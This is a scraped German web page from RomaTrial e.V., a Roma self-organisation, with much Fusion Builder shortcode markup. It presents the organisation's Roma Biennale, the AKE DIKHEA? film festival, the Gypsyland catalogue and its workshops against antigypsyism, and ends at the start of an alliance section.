equal_height_columns=”yes” menu_anchor=”uber_uns” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_image=”http://test.romatrial.org/wp-content/uploads/2018/06/romatrial_leaves_background_uber_uns_videos.png” background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”left” enable_mobile=”yes” parallax_speed=”1.0″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid” flex_align_items=”stretch” flex_column_spacing=”0px” type=”legacy”][fusion_builder_row][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ spacing=”no” center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” padding_right=”40px” padding_left=”40px” animation_type=”slide” animation_direction=”left” animation_speed=”0.1″ last=”false” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” spacing_right=”0px” min_height=”” link=””][fusion_title margin_top=”10″ margin_bottom=”10″ hide_on_mobile=”small-visibility,medium-visibility,large-visibility” size=”6″ content_align=”left” style_type=”single solid” sep_color=”#0a0909″]

Über uns

[/fusion_title][fusion_text rule_style=”default”]

RomaTrial e.V. ist eine transkulturelle Roma-Selbstorganisation und interaktive Plattform mit dem Ziel, die komplexen Problematiken des Antiziganismus auf Bühne, Bildschirm und in den Äther zu bringen – vor allem aber in die Köpfe der Gesellschaft. Unsere Schwerpunkte sind Film- und Kunstfestivals, kulturelle und politische Bildungsarbeit für Jugendliche und Erwachsene, kreative Theater- und Filmprojekte, Sommerschulen sowie Seminare gegen Antiziganismus und Kulturveranstaltungen mit Sinn.

[/fusion_text][/fusion_builder_column][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ spacing=”no” center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_type=”fade” animation_direction=”right” animation_speed=”0.2″ last=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”false” spacing_left=”0px” min_height=”” link=””][fusion_title margin_top=”10″ margin_bottom=”10″ hide_on_mobile=”small-visibility,medium-visibility,large-visibility” size=”6″ content_align=”left” style_type=”single solid” sep_color=”#0a0909″]

Videos

[/fusion_title][fusion_separator style_type=”default” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sep_color=”#0a0909″ alignment=”center” /][rev_slider alias=”romatrial_media_gallery” /][fusion_separator style_type=”default” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sep_color=”#0a0909″ alignment=”center” /][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” equal_height_columns=”yes” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid” flex_align_items=”stretch” type=”legacy”][fusion_builder_row][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ spacing=”no” center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_color=”#fd0b49″ background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” padding_top=”40px” padding_right=”40px” padding_bottom=”40px” padding_left=”40px” animation_type=”slide” animation_direction=”left” animation_speed=”0.1″ last=”false” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” spacing_right=”0px” min_height=”” link=””][fusion_text rule_style=”default”]

ROMA-BIENNALE

[/fusion_text][fusion_separator style_type=”single solid” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sep_color=”#ffffff” top_margin=”0px” bottom_margin=”30px” border_size=”1px” width=”60px” alignment=”center” /][fusion_text rule_style=”default”]

RomaTrial ist Initiator und Träger der ersten selbstorganisierten Biennale von und mit Roma-Künstler*innen aus ganz Europa, eines interdisziplinären Festivals mit Kunst, Musik, Diskurs und Performance! Die erste Roma-Biennale fand anlässlich des Internationalen Tags der Roma im April 2018 am Maxim Gorki Theater statt. Sie vereinte spezifische Ausgrenzungserfahrungen mit individuellen künstlerischen Perspektiven und feministischen Strategien, um Sichtbarkeit und Selbstbestimmung zu provozieren.

[/fusion_text][fusion_builder_row_inner][fusion_builder_column_inner type=”1_3″ type=”1_3″ layout=”1_3″ center_content=”no” hover_type=”none” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” border_style=”solid” animation_direction=”left” animation_speed=”0.3″ last=”false” border_position=”all” first=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” min_height=”” link=””][fusion_imageframe image_id=”12324|full” style_type=”none” hover_type=”zoomin” align=”center” lightbox=”yes” gallery_id=”Roma Biennale” lightbox_image=”http://romatrial.org/wp-content/uploads/2018/06/roma_bienalle_damian_le_bas_globe_full.jpg” alt=”Damian Le Bas – Earth Globe / Retrospective @ Roma Biennale” linktarget=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” animation_direction=”left” animation_speed=”0.3″ lightbox_image_id=”12324|full” aspect_ratio=”1-1″]http://romatrial.org/wp-content/uploads/2018/06/roma_bienalle_damian_le_bas_globe_full.jpg[/fusion_imageframe][/fusion_builder_column_inner][fusion_builder_column_inner type=”1_3″ type=”1_3″ layout=”1_3″ center_content=”no” hover_type=”none” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” border_style=”solid” animation_direction=”left” animation_speed=”0.3″ last=”false” border_position=”all” first=”false” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” min_height=”” link=””][fusion_imageframe image_id=”12133|full” style_type=”none” hover_type=”zoomin” align=”center” lightbox=”yes” gallery_id=”Roma Biennale” lightbox_image=”http://romatrial.org/wp-content/uploads/2018/04/roma_biennale2_sandra_simonida_selimovic_full.jpg” alt=”Sandra &amp; Simonida Selimovic at Come Out Now! – The Long Night of Coming Out” linktarget=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” animation_direction=”left” animation_speed=”0.3″ lightbox_image_id=”12133|full” aspect_ratio=”1-1″]http://romatrial.org/wp-content/uploads/2018/04/roma_biennale2_sandra_simonida_selimovic_full.jpg[/fusion_imageframe][/fusion_builder_column_inner][fusion_builder_column_inner type=”1_3″ type=”1_3″ layout=”1_3″ center_content=”no” hover_type=”none” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” border_style=”solid” animation_direction=”left” animation_speed=”0.3″ last=”true” border_position=”all” first=”false” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” min_height=”” link=””][fusion_imageframe image_id=”12321|full” style_type=”none” hover_type=”zoomin” align=”center” lightbox=”yes” gallery_id=”Roma Biennale” lightbox_image=”http://romatrial.org/wp-content/uploads/2018/06/roma_biennale_romani_embassy_delaine_le_bas-2.jpg” alt=”Delaine Le Bas in Romani Embassy / Roma Biennale” linktarget=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” animation_direction=”left” animation_speed=”0.3″ lightbox_image_id=”12321|full” aspect_ratio=”1-1″]http://romatrial.org/wp-content/uploads/2018/06/roma_biennale_romani_embassy_delaine_le_bas-2.jpg[/fusion_imageframe][/fusion_builder_column_inner][/fusion_builder_row_inner][fusion_separator style_type=”none” hide_on_mobile=”large-visibility” top_margin=”70px” alignment=”center” /][fusion_imageframe image_id=”12089|full” max_width=”160px” style_type=”none” hover_type=”none” align=”center” lightbox=”no” linktarget=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” animation_direction=”left” animation_speed=”0.3″]http://romatrial.org/wp-content/uploads/2018/06/roma_biennale.png[/fusion_imageframe][fusion_button link=”http://www.roma-biennale.eu” text_transform=”uppercase” target=”_blank” alignment=”center” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” color=”custom” button_gradient_top_color=”#ffec00″ button_gradient_bottom_color=”#ffec00″ button_gradient_top_color_hover=”#fdfdff” button_gradient_bottom_color_hover=”#fdfdff” accent_color=”#231f20″ accent_hover_color=”#231f20″ size=”medium” stretch=”default” icon_position=”left” icon_divider=”no” animation_direction=”left” animation_speed=”0.3″ border_color=”#231f20″ border_hover_color=”#231f20″ border_radius_top_left=”0px” border_radius_top_right=”0px” border_radius_bottom_right=”0px” border_radius_bottom_left=”0px”]More info[/fusion_button][/fusion_builder_column][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ spacing=”no” center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_color=”#fedd03″ background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” padding_top=”40px” padding_right=”40px” padding_bottom=”40px” padding_left=”40px” animation_type=”slide” animation_direction=”right” animation_speed=”0.1″ last=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”false” spacing_left=”0px” min_height=”” link=””][fusion_separator style_type=”none” hide_on_mobile=”large-visibility” top_margin=”15px” alignment=”center” /][fusion_imageframe image_id=”11855|full” max_width=”240px” style_type=”none” hover_type=”none” align=”center” lightbox=”no” alt=”ake-dikhea” link=”http://roma-filmfestival.com” linktarget=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” animation_direction=”left” animation_speed=”0.3″]http://romatrial.org/wp-content/uploads/2018/06/akedikhea_02.png[/fusion_imageframe][fusion_text rule_style=”default”]

AKE DIKHEA?

[/fusion_text][fusion_separator style_type=”single solid” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sep_color=”#231f20″ top_margin=”0px” bottom_margin=”30px” border_size=”1px” width=”60px” alignment=”center” /][fusion_text rule_style=”default”]

Antiziganismus macht blind. Blind gegenüber der vielfältigen, komplexen Realität um uns herum, die den weit verbreiteten stereotypen Vorstellungen über Roma und Sinti nicht entspricht. Deswegen riefen wir das AKE DIKHEA? Festival of Romani Film ins Leben, das selbstbestimmt verschiedene Roma-Perspektiven präsentiert. Die zweite Edition fand im Dezember 2018 im Kino Moviemento in Berlin statt.

[/fusion_text][fusion_button link=”http://www.roma-filmfestival.com” text_transform=”uppercase” target=”_blank” alignment=”center” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” color=”custom” button_gradient_top_color=”#ffffff” button_gradient_bottom_color=”#ffffff” button_gradient_top_color_hover=”#231f20″ button_gradient_bottom_color_hover=”#231f20″ accent_color=”#231f20″ accent_hover_color=”#fdfdff” size=”medium” stretch=”yes” icon_position=”left” icon_divider=”no” animation_direction=”left” animation_speed=”0.3″ border_color=”#231f20″ border_hover_color=”#fdfdff” border_radius_top_left=”0px” border_radius_top_right=”0px” border_radius_bottom_right=”0px” border_radius_bottom_left=”0px”]More info[/fusion_button][fusion_separator style_type=”none” hide_on_mobile=”large-visibility” top_margin=”70px” alignment=”center” /][fusion_builder_row_inner][fusion_builder_column_inner type=”1_3″ type=”1_3″ layout=”1_3″ center_content=”no” hover_type=”none” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” border_style=”solid” animation_direction=”left” animation_speed=”0.3″ last=”false” border_position=”all” first=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” min_height=”” link=””][fusion_imageframe image_id=”12363|full” style_type=”none” hover_type=”zoomin” align=”center” lightbox=”yes” gallery_id=”Ake Dikhea” lightbox_image=”http://test.romatrial.org/wp-content/uploads/2017/09/ake_dikhea_jury_big.jpg” alt=”The Jury of Ake Dikhea” linktarget=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” animation_direction=”left” animation_speed=”0.3″ aspect_ratio=”1-1″]http://romatrial.org/wp-content/uploads/2017/09/ake_dikhea_jury_big-e1529307892299.jpg[/fusion_imageframe][/fusion_builder_column_inner][fusion_builder_column_inner type=”1_3″ type=”1_3″ layout=”1_3″ center_content=”no” hover_type=”none” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” border_style=”solid” animation_direction=”left” animation_speed=”0.3″ last=”false” border_position=”all” first=”false” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” min_height=”” link=””][fusion_imageframe image_id=”12455|full” style_type=”none” hover_type=”zoomin” align=”center” lightbox=”yes” gallery_id=”Ake Dikhea” lightbox_image=”http://test.romatrial.org/wp-content/uploads/2018/06/ake_dikhea_jugend_2017-1.jpg” alt=”The audience of Ake Dikhea” linktarget=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” animation_direction=”left” animation_speed=”0.3″ aspect_ratio=”1-1″]http://romatrial.org/wp-content/uploads/2018/06/ake_dikhea_jugend_2017-1.jpg[/fusion_imageframe][/fusion_builder_column_inner][fusion_builder_column_inner type=”1_3″ type=”1_3″ layout=”1_3″ center_content=”no” hover_type=”none” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” border_style=”solid” animation_direction=”left” animation_speed=”0.3″ last=”true” border_position=”all” first=”false” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” min_height=”” link=””][fusion_imageframe image_id=”12456|full” style_type=”none” hover_type=”zoomin” align=”center” lightbox=”yes” gallery_id=”Ake Dikhea” lightbox_image=”http://test.romatrial.org/wp-content/uploads/2018/06/ake_dikhea_kino_moviemento-1.jpg” alt=”Hamze Bytyci on Ake Dikhea? in Moviemento” linktarget=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” animation_direction=”left” animation_speed=”0.3″ aspect_ratio=”1-1″]http://romatrial.org/wp-content/uploads/2018/06/ake_dikhea_kino_moviemento-1.jpg[/fusion_imageframe][/fusion_builder_column_inner][/fusion_builder_row_inner][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” equal_height_columns=”no” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_color=”#fdfdff” background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid” admin_toggled=”no” type=”legacy”][fusion_builder_row][fusion_builder_column type=”1_3″ type=”1_3″ layout=”1_3″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”zoomin” border_style=”solid” border_position=”all” animation_type=”zoom” animation_direction=”static” animation_speed=”0.3″ last=”false” element_content=”” border_sizes_top=”30px” border_sizes_bottom=”30px” border_sizes_left=”30px” border_sizes_right=”30px” first=”true” background_image=”http://romatrial.org/wp-content/uploads/2018/12/Standbild-GYPSYLAND_quadrat.jpg” margin_bottom=”27px” padding_bottom=”263px” padding_right=”0px” spacing=”3%” background_blend_mode=”none” min_height=”” link=””][/fusion_builder_column][fusion_builder_column type=”2_3″ type=”2_3″ layout=”2_3″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_type=”fade” animation_direction=”left” animation_speed=”0.3″ last=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”false” min_height=”” link=””][fusion_title hide_on_mobile=”small-visibility,medium-visibility,large-visibility” size=”2″ content_align=”left” style_type=”single solid”]

Gypsyland: Katalog des Lebenswerks von Damian Le Bas

[/fusion_title][fusion_text rule_style=”default”]

Der Katalog GYPSYLAND dokumentiert die Retrospektive des Lebenswerks von Damian Le Bas, die anlässlich der Ersten Roma Biennale mit dem Titel COME OUT NOW! im April 2018 im Maxim Gorki Theater gezeigt wurde. Damian Le Bas’ GYPSYLAND EUROPA ist eine entgrenzte Welt, “eingeengt weder durch Beschränkungen noch Grenzen, flexibel in Gedanken, positiv in der Ermöglichung von Fähigkeiten, die das Negative umdeutet ins Positive” (Delaine Le Bas).

[/fusion_text][fusion_button link=”http://romatrial.org/gypsyland/” text_transform=”uppercase” target=”_blank” alignment=”left” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” color=”custom” button_gradient_top_color=”#1c3470″ button_gradient_bottom_color=”#1c3470″ button_gradient_top_color_hover=”#231f20″ button_gradient_bottom_color_hover=”#231f20″ accent_color=”#fdfdff” accent_hover_color=”#fdfdff” stretch=”default” icon_position=”left” icon_divider=”no” animation_direction=”left” animation_speed=”0.3″ border_color=”#fdfdff” border_hover_color=”#fdfdff” border_radius_top_left=”0px” border_radius_top_right=”0px” border_radius_bottom_right=”0px” border_radius_bottom_left=”0px”]Mehr erfahren / Bestellen[/fusion_button][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” equal_height_columns=”no” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid” flex_column_spacing=”0px” type=”legacy”][fusion_builder_row][fusion_builder_column type=”1_1″ type=”1_1″ layout=”1_1″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” margin_top=”-5px” animation_type=”slide” animation_direction=”right” animation_speed=”0.3″ last=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” min_height=”” link=””][fusion_section_separator divider_type=”slant” divider_position=”left” divider_candy=”top” backgroundcolor=”#b9e5ce” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” /][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container admin_label=”RomaTrial ARM agains racism” hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” equal_height_columns=”no” hide_on_mobile=”no” background_color=”#ebeaea” background_image=”http://test.romatrial.org/wp-content/uploads/2018/06/romatrial_tree_white_green_leaves.png” background_position=”left top” background_repeat=”no-repeat” fade=”no” background_parallax=”left” enable_mobile=”yes” parallax_speed=”1.0″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid” padding_right=”40px” padding_left=”40px” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” type=”legacy”][fusion_builder_row][fusion_builder_column type=”1_1″ type=”1_1″ layout=”1_1″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_direction=”left” animation_speed=”0.3″ last=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” min_height=”” link=””][fusion_title hide_on_mobile=”small-visibility,medium-visibility,large-visibility” size=”1″ content_align=”left” style_type=”default”]

Adolf-Reichwein-Mobil gegen Rassismus

[/fusion_title][/fusion_builder_column][fusion_builder_column type=”2_3″ type=”2_3″ layout=”2_3″ spacing=”40px” center_content=”yes” target=”_self” hide_on_mobile=”no” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_color=”#00a24e” border_style=”solid” border_position=”all” padding_top=”0%” padding_right=”0″ padding_bottom=”0%” animation_type=”fade” animation_direction=”left” animation_speed=”0.2″ last=”false” align_content=”center” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” spacing_right=”26.666666666666664px” min_height=”” link=””][fusion_text rule_style=”default”]

Inspiriert durch den Medienpädagogen und Widerstandskämpfer Adolf Reichwein bieten wir Workshops gegen Antiziganismus mit verschiedenen Formaten und unterschiedlicher Dauer an.

[/fusion_text][fusion_text rule_style=”default”]

Nach Ihrem individuellen Wunsch verwenden wir bei unseren Workshops Elemente der Theater- und Medienpädagogik, Inputeinheiten, interaktive Übungen aus der Antirassismusarbeit, wir diskutieren über Filmausschnitte oder Medienartikel. Sprechen Sie uns an, um ein individuelles Angebot zu bekommen!

[/fusion_text][fusion_button link=”http://romatrial.org/kontakt/” text_transform=”uppercase” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” color=”custom” button_gradient_top_color=”#00a24e” button_gradient_bottom_color=”#00a24e” button_gradient_top_color_hover=”#fdfdff” button_gradient_bottom_color_hover=”#fdfdff” accent_color=”#fdfdff” accent_hover_color=”#231f20″ size=”medium” stretch=”default” icon=”fa-envelope fas” icon_position=”left” icon_divider=”no” animation_direction=”left” animation_speed=”0.3″ border_color=”#fdfdff” border_hover_color=”#231f20″]Fragen Sie noch heute ein Workshop an![/fusion_button][/fusion_builder_column][fusion_builder_column type=”1_3″ type=”1_3″ layout=”1_3″ spacing=”40px” center_content=”no” target=”_self” hide_on_mobile=”no” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_type=”slide” animation_direction=”right” animation_speed=”0.3″ animation_offset=”top-mid-of-view” last=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”false” spacing_left=”13.333333333333332px” min_height=”” link=””][fusion_separator style_type=”none” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” bottom_margin=”20px” border_size=”0″ alignment=”center” /][fusion_image_before_after before_image=”http://romatrial.org/wp-content/uploads/2018/06/wohnwagen_damian_le_bas_black_white.png” after_image=”http://romatrial.org/wp-content/uploads/2018/06/wohnwagen_damian_le_bas_colorful-1.png” handle_type=”circle” offset=”98″ handle_movement=”hover” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” animation_direction=”left” animation_speed=”0.3″ before_image_id=”12235|full” after_image_id=”12240|full” /][fusion_separator style_type=”none” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” top_margin=”50px” alignment=”center” /][/fusion_builder_column][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ spacing=”40px” center_content=”yes” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_direction=”left” animation_speed=”0.3″ last=”false” align_content=”center” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” spacing_right=”20px” min_height=”” link=””][fusion_text rule_style=”default”]

Das Adolf-Reichwein-Mobil gegen Rassismus ist Preisträger des TakeOff Awards 2016 in der Kategorie „Bildung“

[/fusion_text][fusion_separator style_type=”default” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” top_margin=”40px” bottom_margin=”40px” alignment=”center” /][fusion_separator style_type=”default” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” top_margin=”40px” bottom_margin=”40px” alignment=”center” /][fusion_builder_row_inner][fusion_builder_column_inner type=”1_4″ type=”1_4″ layout=”1_3″ center_content=”no” hover_type=”none” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” border_style=”solid” animation_direction=”left” animation_speed=”0.3″ last=”false” border_position=”all” element_content=”” first=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” min_height=”” link=””][/fusion_builder_column_inner][fusion_builder_column_inner type=”1_2″ type=”1_2″ layout=”1_3″ center_content=”no” hover_type=”none” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” border_style=”solid” animation_direction=”left” animation_speed=”0.3″ last=”false” border_position=”all” element_content=”” first=”false” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” min_height=”” link=””][fusion_imageframe image_id=”12436|full” style_type=”none” hover_type=”zoomin” align=”center” lightbox=”yes” lightbox_image=”http://test.romatrial.org/wp-content/uploads/2018/06/Take-Off-Award-2016-für-RomaTrial-e.V.jpg” alt=”Take Off Award für RomaTrial e.V.” linktarget=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” animation_direction=”left” animation_speed=”0.3″]http://romatrial.org/wp-content/uploads/2018/06/Take-Off-Award-2016-für-RomaTrial-e.V.jpg[/fusion_imageframe][/fusion_builder_column_inner][fusion_builder_column_inner type=”1_4″ type=”1_4″ layout=”1_3″ center_content=”no” hover_type=”none” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” border_style=”solid” animation_direction=”left” animation_speed=”0.3″ last=”true” border_position=”all” element_content=”” first=”false” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” min_height=”” link=””][/fusion_builder_column_inner][/fusion_builder_row_inner][/fusion_builder_column][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ spacing=”40px” center_content=”yes” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_direction=”left” animation_speed=”0.3″ last=”true” align_content=”center” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”false” spacing_left=”20px” min_height=”” link=””][fusion_text rule_style=”default”]

Wir danken dem Holiday Inn Berlin Airport fürs Organisieren des des TakeOff Awards, sowie den Förderern des Preises für Bildung, den “vier freunden”!

[/fusion_text][fusion_separator style_type=”default” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” top_margin=”40px” bottom_margin=”40px” alignment=”center” /][fusion_imageframe image_id=”12172|full” max_width=”100px” style_type=”glow” stylecolor=”rgba(216,215,216,0.65)” hover_type=”liftup” borderradius=”2px” align=”center” lightbox=”no” link=”https://www.ihg.com/holidayinn/hotels/de/de/reservation” linktarget=”_blank” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” animation_direction=”left” animation_speed=”0.3″]http://romatrial.org/wp-content/uploads/2018/06/Logo_Holiday-Inn.png[/fusion_imageframe][fusion_separator style_type=”default” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” top_margin=”20px” bottom_margin=”20px” alignment=”center” /][fusion_imageframe image_id=”12171|full” max_width=”100px” style_type=”glow” stylecolor=”#d8d7d8″ hover_type=”liftup” borderradius=”2px” align=”center” lightbox=”no” linktarget=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” animation_direction=”left” animation_speed=”0.3″]http://romatrial.org/wp-content/uploads/2018/06/Logo-vier-freunde.jpg[/fusion_imageframe][fusion_separator style_type=”default” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” top_margin=”40px” bottom_margin=”40px” alignment=”center” /][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” equal_height_columns=”no” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid” flex_column_spacing=”0px” type=”legacy”][fusion_builder_row][fusion_builder_column type=”1_1″ type=”1_1″ layout=”1_1″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” margin_bottom=”-5px” animation_type=”slide” animation_direction=”left” animation_speed=”0.3″ last=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” min_height=”” link=””][fusion_section_separator divider_type=”slant” divider_position=”left” divider_candy=”bottom” backgroundcolor=”#c98b8b” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” /][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” equal_height_columns=”no” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_color=”#fdfdff” background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid” admin_toggled=”no” type=”legacy”][fusion_builder_row][fusion_builder_column type=”2_3″ type=”2_3″ layout=”2_3″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_type=”fade” animation_direction=”left” animation_speed=”0.3″ last=”false” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” min_height=”” link=””][fusion_title hide_on_mobile=”small-visibility,medium-visibility,large-visibility” size=”2″ content_align=”left” style_type=”single solid”]

Bündnis für Solidarität mit den Sinti und Roma Europas

[/fusion_title][fusion_text rule_style=”default”]

